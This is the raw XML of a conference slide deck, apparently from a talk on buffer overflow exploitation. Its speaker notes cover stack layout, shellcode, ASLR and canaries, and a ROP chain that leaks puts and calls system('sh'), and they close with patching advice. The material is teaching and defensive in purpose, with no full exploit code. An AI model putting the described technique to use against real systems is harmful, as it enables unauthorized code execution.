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1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId50"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="258" r:id="rId3"/>
    <p:sldId id="282" r:id="rId4"/>
    <p:sldId id="310" r:id="rId5"/>
    <p:sldId id="272" r:id="rId6"/>
    <p:sldId id="263" r:id="rId7"/>
    <p:sldId id="311" r:id="rId8"/>
    <p:sldId id="315" r:id="rId9"/>
    <p:sldId id="330" r:id="rId10"/>
    <p:sldId id="333" r:id="rId11"/>
    <p:sldId id="331" r:id="rId12"/>
    <p:sldId id="332" r:id="rId13"/>
    <p:sldId id="316" r:id="rId14"/>
    <p:sldId id="273" r:id="rId15"/>
    <p:sldId id="327" r:id="rId16"/>
    <p:sldId id="328" r:id="rId17"/>
    <p:sldId id="283" r:id="rId18"/>
    <p:sldId id="260" r:id="rId19"/>
    <p:sldId id="317" r:id="rId20"/>
    <p:sldId id="275" r:id="rId21"/>
    <p:sldId id="313" r:id="rId22"/>
    <p:sldId id="312" r:id="rId23"/>
    <p:sldId id="329" r:id="rId24"/>
    <p:sldId id="318" r:id="rId25"/>
    <p:sldId id="299" r:id="rId26"/>
    <p:sldId id="319" r:id="rId27"/>
    <p:sldId id="264" r:id="rId28"/>
    <p:sldId id="320" r:id="rId29"/>
    <p:sldId id="300" r:id="rId30"/>
    <p:sldId id="301" r:id="rId31"/>
    <p:sldId id="302" r:id="rId32"/>
    <p:sldId id="303" r:id="rId33"/>
    <p:sldId id="322" r:id="rId34"/>
    <p:sldId id="323" r:id="rId35"/>
    <p:sldId id="324" r:id="rId36"/>
    <p:sldId id="325" r:id="rId37"/>
    <p:sldId id="321" r:id="rId38"/>
    <p:sldId id="305" r:id="rId39"/>
    <p:sldId id="306" r:id="rId40"/>
    <p:sldId id="307" r:id="rId41"/>
    <p:sldId id="308" r:id="rId42"/>
    <p:sldId id="269" r:id="rId43"/>
    <p:sldId id="265" r:id="rId44"/>
    <p:sldId id="266" r:id="rId45"/>
    <p:sldId id="268" r:id="rId46"/>
    <p:sldId id="267" r:id="rId47"/>
    <p:sldId id="271" r:id="rId48"/>
    <p:sldId id="28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5BE2A-61BE-057D-186E-FCB0C07817AF}" v="368" dt="2023-04-08T06:19:14.495"/>
    <p1510:client id="{05AFCF40-8722-474F-C688-4FF1FF00CB81}" v="37" dt="2023-04-29T02:56:37.633"/>
    <p1510:client id="{105024B4-D7CD-236B-5F2D-6AB3ECEF2AA6}" v="10" dt="2023-04-12T05:52:15.794"/>
    <p1510:client id="{14B59F59-8132-1786-621E-8AD29862BDD1}" v="1133" dt="2023-04-20T05:00:26.718"/>
    <p1510:client id="{17A1E628-A1F1-7232-4019-54782DF8E774}" v="246" dt="2023-03-28T05:58:34.375"/>
    <p1510:client id="{1B1FA43E-8C13-3B98-191D-6153494D4AE5}" v="301" dt="2023-04-09T23:44:17.516"/>
    <p1510:client id="{1B68BBD9-4433-17BC-166F-DB06636FC440}" v="6" dt="2023-04-19T03:59:39.426"/>
    <p1510:client id="{1F20230E-16FD-A0B7-D4CA-D2E32ECB68EC}" v="137" dt="2023-04-21T04:35:05.505"/>
    <p1510:client id="{217EC725-4E80-B007-9045-8F31C0E798CA}" v="912" dt="2023-04-27T05:22:28.811"/>
    <p1510:client id="{2D3D6F4F-EA8D-B40A-DEF6-34C1CE7E75FE}" v="103" dt="2023-03-28T04:20:35.307"/>
    <p1510:client id="{36B2B57B-DF56-F4E3-2AFF-01F079503BAB}" v="622" dt="2023-05-01T02:00:34.054"/>
    <p1510:client id="{3861DB01-FCC0-5DA6-D22A-8CAA398DEE39}" v="5" dt="2023-03-24T06:32:33.031"/>
    <p1510:client id="{41F170E2-E84C-B5C6-2E91-01B640CD2FCB}" v="566" dt="2023-05-03T03:30:28.585"/>
    <p1510:client id="{4FAE0BF5-0C97-2C61-E65E-D754A70D15CA}" v="22" dt="2023-04-18T03:52:29.727"/>
    <p1510:client id="{526F17AF-7E8B-42A7-AE5D-8187381168DA}" v="168" dt="2023-05-14T06:22:43.399"/>
    <p1510:client id="{52A7B4F0-9F8B-D2E9-964B-0530F51721ED}" v="654" dt="2023-03-30T05:37:12.441"/>
    <p1510:client id="{6C37F309-1A3E-9195-360E-2CE718712EDA}" v="66" dt="2023-04-15T05:11:31.346"/>
    <p1510:client id="{6E793414-5E3A-56F6-F555-99495E178A60}" v="12" dt="2023-05-01T01:12:57.395"/>
    <p1510:client id="{6F0F9E89-D439-5F78-6DE6-1DF58EAB31D9}" v="1" dt="2023-04-27T05:54:37.004"/>
    <p1510:client id="{75D04853-EE42-DB84-62F3-B30714BAA736}" v="40" dt="2023-04-28T04:54:04.699"/>
    <p1510:client id="{76202BD4-3528-6E7B-14FD-B51E96721C3F}" v="281" dt="2023-05-12T22:24:23.259"/>
    <p1510:client id="{7D5B07C1-CCA4-4F54-9931-7160CC56FFF2}" v="142" dt="2023-04-11T05:08:00.304"/>
    <p1510:client id="{82BBD0CD-9CA4-BC48-4D0E-BFC77DD08162}" v="403" dt="2023-04-05T06:13:30.340"/>
    <p1510:client id="{9132A92E-64D7-53D7-2F48-C85EB9012890}" v="163" dt="2023-04-21T04:12:03.513"/>
    <p1510:client id="{9EBFC05B-E489-40D0-85C6-9C74EC8DB060}" v="287" dt="2023-05-11T00:29:33.977"/>
    <p1510:client id="{A4B02402-2714-8A7C-5A4F-44E8FBD2750D}" v="227" dt="2023-04-11T05:44:16.139"/>
    <p1510:client id="{ADB99BB2-E63E-BBFF-6967-EC3E8A7D9180}" v="491" dt="2023-04-20T06:01:15.088"/>
    <p1510:client id="{AF484168-7555-F17B-70AE-5312036E1DDF}" v="211" dt="2023-04-29T05:15:36.723"/>
    <p1510:client id="{B4375250-F6DD-9C66-3ADA-713FF822F4C1}" v="92" dt="2023-03-30T04:30:33.840"/>
    <p1510:client id="{BA6AC67D-01CF-557E-26EB-D01BE2704043}" v="21" dt="2023-04-09T23:10:27.430"/>
    <p1510:client id="{BB4B3396-2C58-4A02-8087-05F150F77BB6}" v="995" dt="2023-04-12T05:44:00.848"/>
    <p1510:client id="{BD760FA2-B600-B393-B692-E3B23970ECB3}" v="139" dt="2023-04-21T05:05:37.878"/>
    <p1510:client id="{C0B5DD8B-5537-490D-1467-6CD1699AFCA0}" v="21" dt="2023-05-14T05:37:44.467"/>
    <p1510:client id="{C30A365E-0568-A7FE-73E9-964077BCC3C8}" v="247" dt="2023-05-07T02:54:34.577"/>
    <p1510:client id="{C514C319-56F8-B12D-1BF4-031000080B31}" v="32" dt="2022-10-05T04:40:17.792"/>
    <p1510:client id="{C6D9B410-065D-E912-2840-D12111841966}" v="447" dt="2023-03-25T03:01:09.245"/>
    <p1510:client id="{CB23065C-8CAF-FF51-886B-7BF2AD37DEC5}" v="221" dt="2023-03-28T02:58:37.005"/>
    <p1510:client id="{CB78E065-586D-0FA5-2A2D-E712676D5B2F}" v="119" dt="2023-04-23T15:52:12.873"/>
    <p1510:client id="{CFDF9EF3-B72E-C3B2-7449-9FAB376284F7}" v="239" dt="2023-04-30T08:04:23.509"/>
    <p1510:client id="{D69511E4-EF1F-0F41-20D5-3BBF96449B42}" v="1153" dt="2023-04-27T03:08:54.289"/>
    <p1510:client id="{E66C6E1E-F994-1E41-690E-663FCBFD28A4}" v="145" dt="2023-03-28T02:47:22.112"/>
    <p1510:client id="{E7BB97DC-FE1E-0416-6B5D-5D13EEFA50DD}" v="368" dt="2023-04-19T04:09:38.260"/>
    <p1510:client id="{F10FCD63-5DFA-43C5-BBB3-900063FCAD6E}" v="46" dt="2023-03-28T04:38:54.6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F1BBE-62C3-46CF-A920-41CF3875A54A}" type="datetimeFigureOut">
              <a:t>5/13/2023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A2388-27E1-4255-B3C5-FDD5E35C8C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7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gi-bin/cvekey.cgi?keyword=buffer+overflow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If we google for Buffer Overflow CVE, these are some of the most recent examples - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>CVE - Search Results (mitre.org)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>How often do we use a precompiled binary from either open source repository or a 3rd party vendor for granted?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We often trust the open-source community and vendors to be on top of patching vulnerable pre-compiled binary. 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But that's not always the case. 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Adversaries have a lot of free time and it may only take one vulnerable binary for the attacker to gain access.  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CVE-2021-36194</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Stack-based buffer overflows in the API controllers of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>FortiWeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> that may allow for arbitrary code execution .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CVE-2022-28721</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Buffer overflow leads to  Remote Code Execution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CVE-2022-3602: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buffer overflow leads to Remote Code Execution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CVE-2022-2471: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buffer overflow in EZVIZ Motion Detection leads to Remote Code Execution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p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34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This is the demo code that we will be using through out the rest of the presentation.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19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What is Shellcode? </a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/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Is an assembly code that is used to perform a specific instruction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In this case, we want the shellcode to execute /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> so we can get a shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Calibri"/>
              <a:buChar char="-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0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In traditional buffer overflow exploit, we would place our payload to the stack, and use RIP to point the to the no-op sled address.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29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In traditional buffer overflow exploit, we would place our payload to the stack, and use RIP to point the to the no-op sled address.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88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"Stack canaries" method works by placing a small integer, the value of which is randomly chosen at program start, in memory just before the stack return pointer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>"ASLR":  randomization to the memory space of the executing program.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"No Stack Execution": </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Another approach to preventing stack buffer overflow exploitation is to enforce a memory policy on the stack memory region that disallows execution from the stack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80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83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73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How can we exploit this program?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45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/>
              <a:t>Employs two Python's libraries </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" err="1"/>
              <a:t>pwntools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" err="1"/>
              <a:t>ROPGadget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to develop the exploit.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cs typeface="Calibri"/>
              </a:rPr>
              <a:t>We are interested in pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>, ret and ret gadgets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cs typeface="Calibri"/>
              </a:rPr>
              <a:t>This is because in x86_64 calling convention </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> is used for the first argument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endParaRPr lang="en-US"/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/>
              <a:t>We want "pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" and "ret" gadgets</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRP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/>
              <a:t>"pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" will allow us to pop the value on the stack into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> register</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRP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/>
              <a:t>rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is used for first argument of the function call</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri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50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/>
              <a:t>We also need to find a couple more items to make our ROP payload chain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The first item is the address of the main function in the binary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The second item is the address of the puts function in the binary and the puts function in the global offset table that will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91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Buffer Overflow can be used for the following MITRE Tactics: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Initial Access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Execution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Lateral Movement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Privilege Escalation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340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/>
              <a:t>We also need to find a couple more items to make our ROP payload chain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The first item is the address of the main function in the binary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The second item is the address of the puts function in the binary and the puts function in the global offset table that will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6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Because of ASLR, we can't reliably predict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function, therefore we need to leak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base address at the time of the binary is run.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We utilize the "puts" function instead of the binary to achieve this.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After JUNKJUNK, we get to control RIP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01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Because of ASLR, we can't reliably predict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function, therefore we need to leak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base address at the time of the binary is run.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We utilize the "puts" function instead of the binary to achieve this.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After JUNKJUNK, we get to control RIP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49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Because of ASLR, we can't reliably predict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function, therefore we need to leak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base address at the time of the binary is run.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We utilize the "puts" function instead of the binary to achieve this.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After JUNKJUNK, we get to control RIP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6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Because of ASLR, we can't reliably predict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function, therefore we need to leak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base address at the time of the binary is run.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We utilize the "puts" function instead of the binary to achieve this.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After JUNKJUNK, we get to control RIP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61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After executing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>puts_plts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>, it will print the address of the puts function inside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at the time of execution.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92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We run the "ret" gadget to line up the stack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21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Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>pwntools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> function ELF, we can get the offset of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symbols.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Once we have the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>libc_base</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> address, we can calculate where the "system" function is along with "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>" string inside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90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Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>pwntools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> function ELF, we can get the offset of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symbols.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Once we have the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>libc_base</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> address, we can calculate where the "system" function is along with "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>" string inside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246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Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>pwntools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> function ELF, we can get the offset of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symbols.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Once we have the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>libc_base</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> address, we can calculate where the "system" function is along with "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>" string inside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9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Buffer overflow occurs when the user can put more data than what the program intended to. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/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Calibri,Sans-Serif"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Writing data outside of the intended buffer can corrupt data, crash the program, or cause the execution of malicious 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822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Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>pwntools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> function ELF, we can get the offset of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symbols.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Once we have the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>libc_base</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> address, we can calculate where the "system" function is along with "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>" string inside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7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Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>pwntools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> function ELF, we can get the offset of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symbols.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Once we have the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>libc_base</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> address, we can calculate where the "system" function is along with "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>" string inside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81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Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>pwntools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> function ELF, we can get the offset of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symbols.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Once we have the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>libc_base</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> address, we can calculate where the "system" function is along with "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>" string inside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190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Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>pwntools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> function ELF, we can get the offset of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symbols.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Once we have the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>libc_base</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> address, we can calculate where the "system" function is along with "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>" string inside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11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Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>pwntools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> function ELF, we can get the offset of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symbols.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Once we have the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>libc_base</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> address, we can calculate where the "system" function is along with "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>" string inside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7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Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>pwntools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> function ELF, we can get the offset of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symbols.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Once we have the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>libc_base</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> address, we can calculate where the "system" function is along with "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>" string inside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937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 this demo, we achieved both Lateral Movement as well as Privilege Escalation.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362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* talk about why its important to patch and keep things updated. Especially, IOT and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>applicanes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> (cameras, firewalls, printers, etc.). Everyone has them but not everyone has them on a patch schedule.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Keep an eye on vendor advisories for products in your environment. Make it harder for hackers to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>pwn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> your systems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Scan your environment for out of date software and systems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Make this "action item" section as strong as possible</a:t>
            </a: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12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Here's a simplified example on how the memory works. Within the memory we have the Heap and the Stack. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The Heap grows from low memory address to high memory address. Whereas the Stack grows from high memory address to low memory address. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>There are two operations that we will focus on in this presentation: pop and push.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6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These are the general and special purpose CPU registers in X86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23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These are the general and special purpose CPU registers in X86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05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These are the general and special purpose CPU registers in X86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98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These are the general and special purpose CPU registers in X86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94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These are the general and special purpose CPU registers in X86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23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093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78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30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892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7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913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571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612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6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82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01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4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59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19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62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02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83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10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%3cputs@GLIBC_2.2.5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tel.com/content/dam/develop/external/us/en/documents/introduction-to-x64-assembly-181178.pdf" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/JonathanSalwan/ROPgadget" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://axcheron.github.io/linux-shellcode-101-from-hell-to-shell/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Return-oriented_programmin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damdoupe.com/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/blog/post/2019/02/19/stack-based-buffer-overflow-attacks-what-you-need-to-know/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/vulnerabilities/Buffer_Overflow" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stackoverflow.com/questions/2535989/what-are-the-calling-conventions-for-unix-linux-system-calls-and-user-space-f" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Buffer_overflow" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://aaronbloomfield.github.io/pdr/book/x86-64bit-ccc-chapter.pdf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c48372/KrakenKon2022.git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46E2E74-06CA-4173-B7B0-204D27B1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6970E1C9-C9F9-481F-894F-6978A15CF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1" y="965200"/>
            <a:ext cx="10286108" cy="4927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95FB36-9688-49FD-8F26-AD6071762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347" y="1129284"/>
            <a:ext cx="9957816" cy="45994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543" y="1588168"/>
            <a:ext cx="9149156" cy="2644719"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>A Modern Approach to </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4800">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4800">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Buffer Overflow Exploit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4777740"/>
            <a:ext cx="8626640" cy="504682"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="68580" tIns="68580" rIns="68580" bIns="68580" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Author: Vu Coughlin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8DFF79-735F-44E8-8B9C-D1F28BED7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600" y="4663440"/>
            <a:ext cx="1828800" cy="0"/>
          </a:xfrm>
